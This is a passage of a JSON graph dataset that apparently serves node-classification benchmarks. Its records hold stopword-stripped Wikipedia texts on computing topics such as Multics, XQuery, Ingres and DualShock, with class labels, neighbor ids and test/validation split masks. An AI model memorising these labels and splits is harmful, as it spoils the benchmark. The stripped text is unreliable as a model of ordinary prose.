optimisation choice multics multi-user system expensive main memory design features multics greatly influenced unix operating system originally written two multics programmers ken thompson dennis ritchie superficial influence multics unix evident many areas including naming commands internal design philosophy quite different focusing keeping system small simple correcting deficiencies multics high resource demands limited computer hardware time name unix originally unics pun multics u unix rumored stand uniplexed opposed multiplexed multics underscoring designers rejections multics complexity favor straightforward workable approach smaller computers garfinkel abelson cite alternative origin peter neumann bell labs watching demonstration prototype suggested pun name unics – pronounced eunuchs – castrated multics although dennis ritchie said denied ken thompson transcribed 2007 interview peter seibel refers multics overdesigned overbuilt everything close unusable massachusetts institute technology still claim monstrous success clearly n't admitted however things liked enough multics actually take hierarchical file system shell — separate process replace process prime computer operating system primos referred multics shoebox william poduska founder company poduska later moved found apollo computer whose aegis later domain/os operating systems sometimes called multics matchbox extended multics design heavily networked graphics workstation environment stratus vos operating system stratus computer stratus technologies strongly influenced multics external user interface internal structure bear many close resemblances older project high-reliability availability security features multics extended stratus vos support new line fault tolerant computer systems supporting secure reliable transaction processing stratus vos directly-related descendant multics still active development production usage today protection architecture multics restricting ability code one level system access resources another adopted basis security features icl vme operating system literature contains large number papers multics various components fairly complete list available multics bibliography page important and/or informative ones listed",
    "neighbors": [
      512,
      4097,
      10753,
      10756,
      2056,
      3594,
      13,
      9231,
      6675,
      7191,
      5658,
      9762,
      7217,
      10803,
      7732,
      7733,
      9780,
      4151,
      1593,
      3134,
      2625,
      8262,
      2120,
      1611,
      5714,
      9829,
      107,
      1147,
      5245,
      2179,
      144,
      8852,
      7325,
      8876,
      8879,
      11442,
      6856,
      10442,
      1776,
      5361,
      5363,
      2804,
      4859,
      7939,
      10508,
      8976,
      11539,
      789,
      3350,
      7983,
      7477,
      310,
      823,
      311,
      8502,
      1338,
      7483,
      11075,
      1350,
      4423,
      4424,
      7507,
      3924,
      2901,
      10585,
      2399,
      6502,
      5484,
      879,
      5492,
      2432,
      6529,
      4998,
      4492,
      11153,
      6557,
      1952,
      421,
      6056,
      950,
      8631,
      10176,
      8136,
      5065,
      8155,
      477,
      5598,
      4067,
      3571,
      6652,
      2045,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 6773,
    "label": 4,
    "text": "Marcus_J._Ranum:marcus j. ranum marcus j. ranum born november 5 1962 new york city new york united states computer network security researcher credited number innovations firewalls including building first internet email server whitehouse.gov domain intrusion detection systems held technical leadership positions number computer security companies faculty member institute applied network security marcus ranum born new york city graduated gilman school baltimore maryland attending johns hopkins university obtained bachelor arts psychology 1985 ranum helped design implement digital equipment corporation secure external access link seal later altavista firewall regarded first commercial bastion host firewall 1990 left dec work trusted information systems tis chief scientist development manager internet security products tis ranum became responsible whitehouse.gov internet email site charged responsibility ranum advocated whitehouse.com domain registered well despite advice registered government later registered adult entertainment provider tis developed tis internet firewall toolkit fwtk grant darpa tis worked v-one chief scientist extensively involved company ipo three months ipo ranum formed company network flight recorder nfr served ceo three years stepping cto role ranum later left nfr consult trusecure joining tenable network security cso addition various full-time positions ranum also held board advisory positions nfr security protego networks fortify software ranum spoken usenix audiences lisa 1997 1999 tutorial lisa 2000 keynote 2002 2003 tutorial spoke full disclosure black hat security briefings 2000 recently ranum spoken interop 2005 2007 cansecwest 2010 secure360 2011 previously taught courses sans institute ranum work cited least 15 published u.s. patents well numerous computer network security articles books ranum cited author eponymous law ca n't solve social problems software marcus co-authored series face articles bruce schneier appeared approximately bi-monthly information security magazine since july 2006 ranum one number editors sans newsbites semiweekly email newsletter currently ranum lives morrisdale pennsylvania hobbies include photography firearms maintains active stock photography account deviantart wrote essay oleg volk pro-firearms site www.a-human-right.com marcus ranum also interviewed digital artist brandon pence nwflaa read 2 parts part 1 part 2 atheist maintaining blog freethought blogs network",
    "neighbors": [
      1634,
      1315,
      10437,
      2118,
      8998,
      331,
      7692,
      1101,
      11502,
      10417,
      6834,
      1331,
      11505,
      5245,
      2110,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 6774,
    "label": 7,
    "text": "PySpark:pyspark apache spark open-source distributed general-purpose cluster-computing framework released support python spark pyspark provides interface programming entire clusters implicit data parallelism fault tolerance following sub-packages provided following classes marked core classes sample code may look like follows",
    "neighbors": [
      7699,
      1047,
      8217,
      11303,
      6184,
      7218,
      9789,
      7742,
      2113,
      7233,
      7750,
      2140,
      7261,
      8799,
      4194,
      8810,
      2163,
      7802,
      3197,
      10377,
      6797,
      8860,
      6815,
      5798,
      4286,
      6338,
      1222,
      4294,
      4308,
      2264,
      8408,
      731,
      11487,
      8425,
      747,
      8447,
      1296,
      785,
      7963,
      3877,
      2345,
      4909,
      7983,
      8501,
      823,
      4919,
      1851,
      5948,
      7485,
      8514,
      5956,
      4423,
      1866,
      8523,
      4944,
      1363,
      344,
      865,
      11111,
      8554,
      1913,
      7567,
      11161,
      6555,
      10661,
      9126,
      5047,
      4538,
      1991,
      1480,
      5066,
      8139,
      9677,
      9179,
      990,
      10719,
      5090,
      11235,
      7142,
      7159,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6775,
    "label": 9,
    "text": "XQuery:xquery xquery xml query query functional programming language queries transforms collections structured unstructured data usually form xml text vendor-specific extensions data formats json binary etc. language developed xml query working group w3c work closely coordinated development xslt xsl working group two groups share responsibility xpath subset xquery xquery 1.0 became w3c recommendation january 23 2007 xquery 3.0 became w3c recommendation april 8 2014 xquery 3.1 became w3c recommendation march 21 2017 xquery functional side effect-free expression-oriented programming language simple type system summed kilpeläinen xquery provides means extract manipulate data xml documents data source viewed xml relational databases office documents xquery contains superset xpath expression syntax address specific parts xml document supplements sql-like flwor expression performing joins flwor expression constructed five clauses named let order return language also provides syntax allowing new xml documents constructed element attribute names known advance xml-like syntax used cases expressions referred dynamic node constructors available constructs defined expressions within language arbitrarily nested language based xquery xpath data model xdm uses tree-structured model information content xml document containing seven kinds nodes document nodes elements attributes text nodes comments processing instructions namespaces xdm also models values sequences singleton value considered sequence length one items sequence either xml nodes atomic values atomic values may integers strings booleans full list types based primitive types defined xml schema features updating xml documents databases full text search capability part core language defined add-on extension standards xquery update facility 1.0 supports update feature xquery xpath full text 1.0 supports full text search xml documents xquery 3.0 adds support full functional programming functions values manipulated stored variables passed higher-order functions dynamically called sample xquery code lists unique speakers act shakespeare play hamlet encoded hamlet.xml xquery constructs performing computations expressions statements even though keywords appear suggest statement-like behaviors execute function expression within body evaluated value returned thus write function double input value one simply writes write full query saying 'hello world one writes expression style common functional programming languages examples xquery used although xquery initially conceived query language large collections xml documents also capable transforming individual documents capabilities overlap xslt designed expressly allow input xml documents transformed html formats xslt 2.0 xquery standards developed separate working groups within w3c working together ensure common approach appropriate share data model xdm type system function library include xpath 2.0 sublanguage two languages however rooted different traditions serve needs different communities xslt primarily conceived stylesheet language whose primary goal render xml human reader screen web web template language paper xquery primarily conceived database query language tradition sql two languages originate different communities xslt stronger handling narrative documents flexible structure xquery stronger data handling example performing relational joins xslt 1.0 appeared recommendation 1999 whereas xquery 1.0 became recommendation early 2007 result xslt still much widely used languages similar expressive power though xslt 2.0 many features missing xquery 1.0 grouping number date formatting greater control xml namespaces many features planned xquery 3.0 comparison must take account fact xslt 1.0 xslt 2.0 different languages xslt 2.0 particular heavily influenced xquery move strong typing schema-awareness usability studies shown xquery easier learn xslt especially users previous experience database languages sql attributed fact xquery smaller language fewer concepts learn fact programs concise also true xquery orthogonal expression used syntactic context contrast xslt two-language system xpath expressions nested xslt instructions vice versa xslt currently stronger xquery applications involve making small changes document example deleting note elements applications generally handled xslt use coding pattern involves identity template copies nodes unchanged modified specific templates modify selected nodes xquery equivalent coding pattern though future versions possible tackle problems using update facilities language development xquery 1.0 lacked kind mechanism dynamic binding polymorphism remedied introduction functions first-class values xquery 3.0 absence capability starts become noticeable writing large applications writing code designed reusable different environments xslt offers two complementary mechanisms area dynamic matching template rules ability override rules using codice_1 make possible write applications multiple customization layers absence facilities xquery 1.0 deliberate design decision consequence xquery amenable static analysis essential achieve level optimization needed database query languages also makes easier detect errors xquery code compile time fact xslt 2.0 uses xml syntax makes rather verbose comparison xquery 1.0 however many large applications take advantage capability using xslt read write modify stylesheets dynamically part processing pipeline use xml syntax also enables use xml-based tools managing xslt code contrast xquery syntax suitable embedding traditional programming languages java see xquery api java c necessary xquery code also expressed xml syntax called xqueryx xqueryx representation xquery code rather verbose convenient humans easily processed xml tools example transformed xslt stylesheets two major extensions xquery developed w3c reached recommendation status extensions xquery 1.0 work taking forward work xquery 3.0 abandoned lack resources work xquery 3.0 published recommendation 8 april 2014 xquery 3.1 recommendation february 2017 scripting procedural extension xquery designed never completed expath community group develops extensions xquery related standards xpath xslt xproc xforms following extensions currently available jsoniq extension xquery adds support extract transform data json documents jsoniq superset xquery 3.0 published creative commons attribution-sharealike 3.0 license exquery project develops standards around creating portable xquery applications following standards currently available portions borrowed permission books xml hacks o'reilly media xquery o'reilly media previous version based article",
    "neighbors": [
      9345,
      11650,
      8070,
      5255,
      7943,
      8201,
      11528,
      9467,
      5880,
      6160,
      6161,
      5907,
      4630,
      151,
      11030,
      2972,
      5917,
      10910,
      4255,
      4768,
      7455,
      9893,
      10791,
      4392,
      1964,
      5677,
      10413,
      7983,
      6709,
      1594,
      5051,
      3388,
      7612,
      8762,
      6335,
      9914,
      6850,
      2757,
      2374,
      7878,
      9286,
      9290,
      7627,
      10571,
      11219,
      5588,
      2901,
      8788,
      10453,
      987,
      2780,
      8923,
      479,
      4960,
      1250,
      9828,
      4069,
      6502,
      6629,
      8421,
      11625,
      5612,
      2669,
      10611,
      4213,
      502,
      10486,
      2296,
      6651,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 6776,
    "label": 3,
    "text": "Dragon_Knight_II:dragon knight ii dragon knight ii ドラゴンナイトii fantasy-themed eroge role-playing video game dragon knight franchise originally developed published elf corporation 1990-1991 japan first sequel original dragon knight game 1989 game erotic dungeon crawler young warrior takeru fights lift witch curse turned girls monsters following commercial critical success dragon knight ii elf followed dragon knight iii knights xentar 1991 censored remake dragon knight ii published nec avenue 1992 dragon knight ii available japanese gameplay system changed much since first dragon knight game still standard dungeon crawler first-person view perspective 2d graphics player spends time navigating dungeon-like mazes fighting enemies progress made mazes become complicated first game aid player form mini-map grid coordinates player also visit shops converse non-hostile npcs game starts one player character takeru two characters join later game battle system also undergone minor changes still features turn-based battles mostly randomly generated fights better balanced first game player attack defend use spells items deal various types female enemies berserker banshee catgirl centaur elf harpy ninja mummy werewolf fought one time enemies actually girls transformed monsters whenever player character fights one subdued enemy loses clothing later enemies revert normal self gratitude offer sex protagonist cutscene censored console versions also one boss beat end characters voice actors include taverner totani koji weaponsmith yukitoshi hori old witch hiroyuki sato apothecary witch isamu tanonaka rem lisa hatayama mei noriko namiki messiah natsuko yamada merumo mayumi horikawa cherry akiko sato orchid azusa nakao mami kaori ohara hamy minako takenouchi rika tomomi uesaka monami masami suzuki mischa mihoko fujiwara tanya yasuko kajimura nadia yuki kato bunny junko shimakata mimi yoko asada paula naomi matamura betty yumiko sakita marie mayumi seto lina mayumi shigeno eve megumi kanba nina naoko nakamura lara yasuko hirayama game narrated kaneto shiozawa vagabond youth hero first dragon knight takeru yamato wanders small town phoenix finds terrorized devoid young men phoenix ruled group powerful wicked witches destroyed all-male dragon knights three years events game woman known mesaanya arrived phoenix first appeared friendly gained villagers trust healer revealed true colors took witch tower forbade love men women next morning takeru arrival sees town changed mesaanya steals set seven evil-sealing holy scriptures takeru delivered used possesses young maiden named kate also kidnaps 28 village girls turns minions guard witch tower reluctantly takeru decides enter tower collect scriptures break curse ultimate goal takeru defeat witch supposed wait top tower also needs rescue girls one one course game takeru joined burly merchant named baan originally sent phoenix mysterious spell-casting priestess named sophia also meets rescues kate fiancé young man neighboring town went first rescue kate without combat experience disappeared eventually bewitched girls saved time find mesaanya since witch throne room empty kate also found looking takeru learns witches conquered help special-metal falcon sword genji armor capable resisting magic searching artifacts party descends hidden dungeon town graveyard baan reveals ancestor fought witches killed queen mesaanya ancestor twist ending sophia true identity revealed really disguised mesaanya along magic blast gravely wounds baan shocked takeru revealed son god legendary armor set god could use wraps around decisive duel mesaanya slain kate finally freed spell peace restored village quest completed takeru spends night kate marry leaving adventures game originally released 1990-1991 msx2 nec pc-8801 nec pc-9801 x68000 computer systems enhanced pc engine port removed sexually explicit content added voice acting new graphics developed tamtam released nec avenue 1992 among controversies first erotic game officially published video game console two soundtracks released japan nec avenue dragon knight ii fantastic remix ドラゴンナイト ii ファンタスティック・リミックス october 1991 dragon knight ii pc engine world ドラゴンナイト ii ～ｐｃエンジンワールド 1992 distributed nippon columbia like predecessor dragon knight ii commercial success game placed third msx magazine msx soft top 30 best-selling chart may 1991 even one year later remained 28th place pc engine version fifth pc engine fan chart august 1992 magazine review gave highly positive score 90 famitsu gave score 24/40 electronic gaming monthly egm reported dragon knight ii became sleeper hit japanese role-playing fans made popular fact noticeably different rpgs game opted lots women instead beasts slight characteristics monsters predicting action scantily clad women attack sequel really entice japanese market egm also included game tons interesting people meet 1993 ranking top ten hottest video game babes second place pc engine fan listed mesaanya sophia kate among sexiest female characters pc engine games takeru renamed desmond west returns hero 1991 sequel dragon knight iii titled knights xentar highly rewritten western-localized versions phoenix takeru celebrity former witch tower renamed tower takeru honor revisited sequel fully recovered baan rejoins fight demons kate romantically met takeru uses falcon sword genji armor baan marries marie one girls dragon knight ii",
    "neighbors": [
      6696,
      4425,
      8355
    ],
    "mask": "None"
  },
  {
    "node_id": 6777,
    "label": 5,
    "text": "National_Transportation_Communications_for_Intelligent_Transportation_System_Protocol:national transportation communications intelligent transportation system protocol national transportation communications intelligent transportation system protocol ntcip family standards designed achieve interoperability interchangeability computers electronic traffic control equipment different manufacturers nticp around 20 years increasingly use smart city initiatives suppliers technology example riders want know next bus arrive stop using apps use ntcip siemens initiatives seattle elsewhere future ntcip used two way communication vehicles traffic signals ability buses control traffic lights done sinwaves protocol product joint standardization project guided joint committee ntcip composed six representatives national electrical manufacturers association nema american association state highway transportation officials aashto institute transportation engineers ite joint committee turn formed 14 technical working groups develop maintain standards initiated produced 50 standards information reports project receives funding contract united states department transportation usdot part wider effort develop comprehensive family intelligent transportation system standards nema initiated development ntcip 1992 early 1993 us federal highway administration fhwa brought together transportation industry representatives discuss obstacles installing field equipment new intelligent transportation systems representatives said number one priority need industry-wide standard data communications protocol since nema transportation section members already started work new industry standard offered expedite expand scope activities key objectives new ntcip protocol interchangeability similar roadside devices interoperability different types devices communications channel 1996 fhwa suggested partnership standards developing organizations expand user industry involvement aashto ite signed agreement nema establish joint committee ntcip work together developing maintaining ntcip standards ntcip enabled center field communication command/control equipment different manufacturers specified procured deployed tested ntcip communications standards field devices listed corresponding ntcip document number shown parentheses center center c2c communication involves peer-to-peer communications computers involved information exchange real-time transportation management many-to-many network type communication similar internet center request information provide information number centers example center center communications two traffic management centers exchange real-time information inventory status traffic control devices allows center system know timing plan example center system running allow traffic signal coordination across center geographic boundaries examples type communication include ntcip communications standards center center communications listed corresponding ntcip document number shown parentheses ntcip coordinated information level standards development organizations development center-to-center application profiles supports ite traffic management data dictionary ite tmdd ieee 1512 incident management ieee 1512 apta transit communications interface profiles apta tcip sae j2354 advanced traveler information systems standards ntcip framework based primarily open standards internet engineering task force ietf world wide web consortium w3c iso plus ntcip data dictionary standards specific task device communications layered modular approach communications standards used represent data communications two computers electronic devices ntcip refers “ levels ” ntcip rather “ layers ” distinguish hierarchical architecture applied defined open system interconnection reference model osi model iso internet engineering task force ietf five ntcip levels information level application level transport level subnetwork level plant level figure used permission shows structure ntcip information application transport subnetwork plant levels ensure working system deployers select specify least one ntcip protocol profile level discussion level ntcip standards apply level follows ntcip framework preclude combinations beyond expressly indicated diagram",
    "neighbors": [
      2948,
      124,
      8527
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6778,
    "label": 9,
    "text": "CBASIC:cbasic cbasic compiled version basic programming language written cp/m operating system gordon eubanks 1976–1977 enhanced version basic-e. basic-e eubank master thesis project developed pl/m eubanks gary kildall new cp/m operating system men naval postgraduate school monterey california basic-e based basic compiler originally written gary kildall 1974 developed public expense basic-e public domain could marketed exclusively seymour rubinstein marketing director imsai contacted eubanks asked create saleable version contract imsai 8080 microcomputer eubanks developed cbasic spare time still naval officer stationed submarine uss george washington vallejo california retained joint ownership program imsai sold program company compiler systems acquired digital research 1981 basic-e early versions cbasic compiled source code intermediate p-code file executed separate run-time interpreter program cbasic could execute minimum 24 kb memory line numbers program source optional unless needed label program jump cbasic proved popular incorporated 14-digit binary-coded decimal bcd math eliminated mbasic rounding errors sometimes troublesome accounting cbasic2 adds following features infoworld 1980 described cbasic primary language development commercial cp/m applications developers widespread familiarity basic ability distribute royalty-free binaries without source code cbasic owners magazine stated language become popular despite serious drawbacks including required preprocessor interpreted source code making debugging difficult slow speed incompatible changes jerry pournelle said may 1983 digital research practically ruin ed eubanks cbasic manual acquiring company new edition much better",
    "neighbors": [
      10113,
      3718,
      5896,
      6921,
      7691,
      1805,
      9997,
      3216,
      786,
      11412,
      22,
      2840,
      2201,
      3481,
      3736,
      9881,
      797,
      3233,
      11683,
      8868,
      5925,
      8101,
      4136,
      2729,
      7849,
      10666,
      11562,
      8494,
      303,
      7343,
      7983,
      178,
      11315,
      4409,
      315,
      7355,
      7486,
      7870,
      4160,
      7999,
      4674,
      4548,
      8262,
      7495,
      712,
      10750,
      847,
      10067,
      3413,
      1879,
      92,
      11229,
      2915,
      5220,
      5603,
      5733,
      4727,
      9188,
      10083,
      11243,
      2541,
      8429,
      2672,
      3056,
      4337,
      5747,
      9329,
      759,
      11513,
      6910,
      1535
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6779,
    "label": 4,
    "text": "Pre-shared_key:pre-shared key cryptography pre-shared key psk shared secret previously shared two parties using secure channel needs used build key shared secret key derivation function typically used systems almost always use symmetric key cryptographic algorithms term psk used wi-fi encryption wired equivalent privacy wep wi-fi protected access wpa method called wpa-psk wpa2-psk also extensible authentication protocol eap known eap-psk cases wireless access points ap clients share key characteristics secret key determined system uses system designs require keys particular format password passphrase hexadecimal string secret used systems involved cryptographic processes used secure traffic systems crypto systems rely one keys confidentiality one particular attack always possible keys brute force key space search attack sufficiently long randomly chosen key resist practical brute force attack though principle attacker sufficient computational power see password strength password cracking discussion unavoidably however pre-shared keys held parties communication compromised one end without knowledge anyone several tools available help one choose strong passwords though network connection inherently unsafe one general know anyone may eavesdropping interaction choosing keys used cryptographic algorithms somewhat different pattern whatsoever avoided pattern may provide attacker lower effort attack brute force search implies random key choice force attackers spend much effort possible difficult principle practice well general rule software except cryptographically secure pseudorandom number generator csprng avoided",
    "neighbors": [
      10908,
      2430,
      7426,
      6916,
      8674,
      9640,
      8265,
      3742,
      9356,
      10574,
      2228,
      1941,
      10329,
      10332,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 6780,
    "label": 1,
    "text": "Ingres_(database):ingres database ingres database commercially supported open-source sql relational database management system intended support large commercial government applications ingres database fully open source global community contributors however actian corporation announced april 2018 acquired hcl technologies controls development ingres makes certified binaries available download well providing worldwide support ingres began research project university california berkeley starting early 1970s ending 1985 original code like projects berkeley available minimal cost version bsd license ingres spawned number commercial database applications including sybase microsoft sql server nonstop sql number others postgres post ingres project started mid-1980s later evolved postgresql acid compatible fully transactional including ddl statements part lisog open-source stack initiative 1973 system r project getting started ibm research team released series papers describing system building two scientists berkeley michael stonebraker eugene wong became interested concept reading papers started relational database research project already raised money researching geographic database system berkeley economics group called ingres interactive graphics retrieval system decided use money fund relational project instead used seed new much larger project decided re-use original project name new project became university ingres funding stonebraker approached darpa obvious funding source computing research development time darpa office naval research onr turned already funding database research elsewhere stonebraker introduced idea agencies help colleagues eventually obtained modest support nsf three military agencies air force office scientific research army research office navy electronic systems command thus funded ingres developed mid-1970s rotating team students staff ingres went evolution similar system r early prototype 1974 followed major revisions make code maintainable ingres disseminated small user community project members rewrote prototype repeatedly incorporate accumulated experience feedback users new ideas research project ended 1985 ingres remained largely similar ibm system r concept based largely dec machines unix vax/vms unlike system r ingres source code available tape modest fee 1980 1,000 copies distributed primarily universities many students u.c berkeley universities used ingres source code worked various commercial database software systems berkeley students jerry held later karel youseffi moved tandem computers built system evolved nonstop sql tandem database system re-implementation ingres technology evolved system ran effectively parallel computers included functionality distributed data distributed execution distributed transactions last fairly difficult components system first released late 1970s 1989 system could run queries parallel product became fairly famous one systems scales almost linearly number processors machine adding second cpu existing nonstop sql server almost exactly double performance tandem later purchased compaq started re-write 2000 product hewlett-packard early 1980s ingres competed head-to-head oracle two products widely regarded leading hardware-independent relational database implementations comparable functionality performance market share pricing many commentators considered ingres perhaps marginally superior product around 1985 however ingres steadily lost market share one reason oracle aggressive marketing another increasing recognition sql preferred relational query language ingres originally provided different language quel conversion sql delivered ingres version 6 took three years losing valuable time race robert epstein chief programmer project berkeley formed britton lee inc. along students ingres project paula hawthorn michael ubell joined later eric allman later epstein founded sybase sybase 2 product behind oracle time 1980s 1990s informix came nowhere took 1997 sybase product line also licensed microsoft 1992 rebranded microsoft sql server relationship soured late 1990s today sql server outsells sybase wide margin several companies used ingres source code produce products successful company named relational technology inc. rti founded 1980 stonebraker wong another berkeley professor lawrence a. rowe rti renamed ingres corporation late 1980s company ported code dec vax/vms commercial operating system dec vax computers also developed collection front-end tools creating manipulating databases e.g. reporterwriters forms entry update etc application development tools time much source rewritten add functionality example multiple-statement transactions sql b-tree access method date/time datatypes etc improve performance example compiled queries multithreaded server company purchased ask corporation november 1990 founders left company next several months 1994 ask/ingres purchased computer associates continued offer ingres variety brand names example openingres ingres ii advantage ingres 2004 computer associates released ingres r3 open source license code includes dbms server utilities character-based front-end application-development tools essence code everything except openroad windows 4gl gui-based development environment november 2005 garnett helfrich capital partnership computer associates created new company called ingres corporation provided support services ingres openroad connectivity products february 2006 ingres corporation released ingres 2006 gnu general public licence ingres 9.3 released october 7 2009 limited release targeted new application development linux windows ingres 10 released october 12 2010 full release supporting upgrade earlier versions product available 32-bit 64-bit linux 32-bit microsoft windows open-source community initiatives ingres included community bundles – alliances open-source providers projects alfresco jaspersoft hibernate apache tomcat eclipse enable ingres provide platform technology open-source technologies established ingres carleton university series open source boot camps held 2008 work open-source communities projects introduce university college students staff concepts realities open source involvement includes global ingres university alliances ingres engineering summit ingres janitors project several memberships open-source initiatives ingres icebreaker appliance combines ingres database linux operating system enabling people simultaneously deploy manage database operating system ingres café consolidated application foundation eclipse created team developers carleton university integrated environment helps software architects accelerate simplify java application development ingres geospatial community-based project create industry-standards-compliant geospatial storage features ingres dbms words storing map data providing powerful analysis functions within dbms november 2010 garnett helfrich capital acquired last 20 equity ingres corp already september 22 2011 ingres corporation became actian corporation focused action apps use ingres vectorwise rdbms systems postgres project started mid 1980s address limitations existing database-management implementations relational model primary among inability let user define new domains types combinations simpler domains see relational model explanation term domain project explored ideas including incorporation write-once media e.g. optical disks use massive storage e.g. never delete data inferencing object-oriented data models implementation also experimented new interfaces database application programs e.g. portals sometimes referred fat cursors resulting project named postgres aimed introducing minimum number features needed add complete types support included ability define types also ability fully describe relationships – time widely used maintained entirely user postgres database understood relationships could retrieve information related tables natural way using rules 1990s stonebraker started new company commercialize postgres name illustra company technology later purchased informix ingres 11 released 18 april 2017 known actian x hybrid database",
    "neighbors": [
      5384,
      6797,
      10389,
      10518,
      11030,
      2972,
      9893,
      3241,
      10413,
      10286,
      7983,
      9397,
      823,
      5691,
      3515,
      9151,
      6850,
      1606,
      9286,
      3784,
      6479,
      6993,
      472,
      4057,
      9177,
      8539,
      6622,
      1636,
      1383,
      5612,
      9452,
      3951,
      5999,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6781,
    "label": 3,
    "text": "DualShock:dualshock dualshock originally dual shock trademarked dualshock dual shock line gamepads vibration-feedback analog controls developed sony interactive entertainment playstation family systems dualshock introduced japan november 1997 launched north american market may 1998 first introduced secondary peripheral original playstation updated version playstation console included controller sony subsequently phased digital controller originally included console well sony dual analog controller 28 million dualshock controllers sold brand name excluding bundled controllers dualshock analog controller scph-1200 controller capable providing vibration feedback based onscreen actions taking place game game supports well analog input two analog sticks name derives use two dual vibration motors shock motors housed within handles controller left one larger powerful one right allow varying levels vibration dualshock differs nintendo 64 rumble pak respect rumble pak uses single motor rumble pak also uses batteries power vibration function corded varieties dualshock use power supplied playstation however third party dualshock-compatible controllers use batteries instead playstation power supply rumble feature dualshock similar one featured first edition japanese dual analog controller feature removed shortly controller released dualshock like predecessor dual analog controller two analog sticks unlike earlier controller dualshock analog sticks feature textured rubber grips rather smooth plastic tips recessed grooves found dual analog controller dualshock also features two additional buttons compared dual analog l3 r3 triggered depressing analog sticks differences dual analog dualshock include longer grips/handles slightly different l2/r2 buttons dualshock controller widely supported shortly launch new titles including spyro dragon tekken 3 included support vibration feature dual analog sticks capcom re-released resident evil director cut resident evil 2 support controller added newer versions games designed dual analog vibration capability porsche challenge crash bandicoot 2 also work many games took advantage presence two motors provide vibration effects stereo including gran turismo playstation port quake ii released 1999 playstation hit ape escape became first game explicitly require dualshock/dual-analog-type controllers gameplay requiring use analog sticks 2000 ps one remodeled version original playstation released slightly redesigned dualshock controller scph-110 similar first one except color white instead gray middle controller ps one logo instead playstation naming buttons analog sticks cord brighter previous one connector semi-circle shape round edge also came colors dualshock also compatible playstation 2 use connector protocol however certain ps2 games utilize dualshock 2 analog buttons bouncer compatible dualshock dualshock fully forwards compatible playstation 2 console used play playstation games playstation 2 computer entertainment system announced dualshock 2 analog controller scph-10010 included almost exactly externally previous dualshock analog controller however minor cosmetic changes different screw positioning one fewer screw blue dualshock 2 logo added top controller connector square dualshock cable connector black rather grey standard controller black colors came later rather grey original dualshock analog sticks also noticeably stiffer original dualshock internally dualshock 2 lighter buttons except analog mode start select l3 r3 buttons readable analog values pressure-sensitive dualshock 2 made available various colors black satin silver ceramic white slate grey ocean blue emerald green crimson red candy pink original playstation forward compatible dualshock 2 playstation 3 backward compatible dualshock dualshock 2 use third party peripherals connect controller console via usb port however dualshock dualshock 2 work properly games require sixaxis functionality heavy rain announced 2007 tokyo game show dualshock 3 wireless controller scph-98050/cechzc2 gamepad playstation 3 replaces sixaxis wireless controller originally released earlier versions console dualshock 3 nearly identical previous sixaxis version adds haptic feedback – also known force feedback – capabilities found dualshock dualshock 2 sony settled patent infringement lawsuit immersion march 2007 following lengthy legal battle settlement cleared way incorporating missing rumble feature sixaxis lacked vibration function motion-sensing capabilities dualshock 3 used simultaneously without one interfering like sixaxis also usb mini-b port charging also used psp go via bluetooth though controller psp go must registered using ps3 console dualshock 3 identified dualshock 3 sixaxis markings also weighs 40 predecessor sixaxis weighed rear markings indicate original dualshock 3 draws 300 current 3.7 v power consumption 1.11 w order magnitude increase 30 current 3.7 v 0.111 w listed sixaxis however current drawn constantly maximum current rumble active main power source internal 3.7 v li-ion battery tentatively capable storing 570 mah provides 30 hours continuous gaming full charge third party replacement batteries also available like sixaxis dualshock 3 comes instructions remove replace battery dualshock 3 also draw power usb cable via usb mini-b connector top controller allows controller used battery low also used charging battery connected via usb controller communicates console usb cable rather bluetooth along release 'slim model ps3 sony released new version dualshock 3 a1 uses 5.0 v 500 connected still contains 3.7 v battery revision dualshock 3 away additional plastic brackets l1/r1 buttons l2/r2 triggers increasing controller rigidity indicator lights soldered directly board comes slightly revised color schemes dualshock 3 compatible standard usb mini-b cable many usb chargers official charging cables available sony include official cable usb 2.0 cable pack wall charger ac adapter charging kit third-party usb charger used must act usb host device rather simply providing power appropriate pins since sixaxis dualshock 3 require host signal wake begin charging sony representative confirmed april 2 2008 original sixaxis controller would officially discontinued release force-feedback enabled dualshock 3 mid-april 2008 sixaxis longer produced 2008 dropped stock retailers dualshock 3 made available various colors black satin silver ceramic white classic white metallic blue deep red pink jungle green olive candy blue light blue urban camouflage three-color digital camouflage crimson red transparent red cosmic blue transparent blue colors made available markets times additional colors also made available alongside limited edition consoles including gun-metal grey cloud black dark grey limited edition baseball themed dualshock 3 controller released march 8 2011 coincide release another color metallic gold became available june 2012 limited edition europe north america sold exclusively gamestop october 2012 limited edition controller available uk part console bundle coincide launch game americas game controller bundle november 1 2013 sony announced new see-through crystal model dualshock 3 controller japan dualshock 4 cuh-zct1 playstation 4 controller similar dualshock 3 several new features one new feature built-in two-point capacitive touch pad front controller clicked controller supports motion detection via three-axis gyroscope three-axis accelerometer vibration includes non-removable rechargeable 3.7 v 1000 mah lithium-ion battery charged system rest mode weighs dimensions also lacks sony logo front due touchpad place top gamepad features light bar three leds illuminate different colors used identify players matching colors characters controlling game provide enhanced feedback immersion changing patterns colors reaction gameplay example grand theft auto v player wanted police light bar flashes red blue also used conjunction playstation camera judge positions movements multiple players light bar developed playstation vr controller features several input output connectors stereo headset jack 3.5 mm omtp trrs connector micro-usb port extension port charged via microusb dedicated charging station console even console also includes mono speaker like wii remote second major controller video game history feature dualshock 4 features following buttons ps button share button options button directional buttons action buttons triangle circle cross square shoulder buttons r1/l1 triggers r2/l2 analog stick click buttons l3/r3 touch pad click button mark several changes dualshock 3 previous playstation controllers start select buttons merged single options button dedicated share button allows players upload screenshots videos gameplay experiences joysticks triggers redesigned based developer input ridged surface joysticks featuring outer ring surrounding convex dome caps dualshock 4 buttons differ slightly functionality dualshock 3 l1 l2 r1 r2 buttons pressure-sensitive change functionality dualshock 2 3 likely due fact games utilize buttons well due used competitors controllers including wii u xbox one playstation 3 forward compatible dualshock 4 originally via microusb cable firmware update 4.60 ps3 added wireless connectivity however motion vibration functions supported start select buttons longer present options share buttons respectively replace sony initially released dualshock 4 estimated around 10 wear issues rubber surface left analog stick exhibited excessive wear tearing short-term use january 2014 sony issued statement acknowledging issue small percentage controllers early september 2016 sony confirmed second generation dualshock 4 controllers known dualshock v2 cuh-zct2 hosts slight improvements original dualshock 4 including usb communication 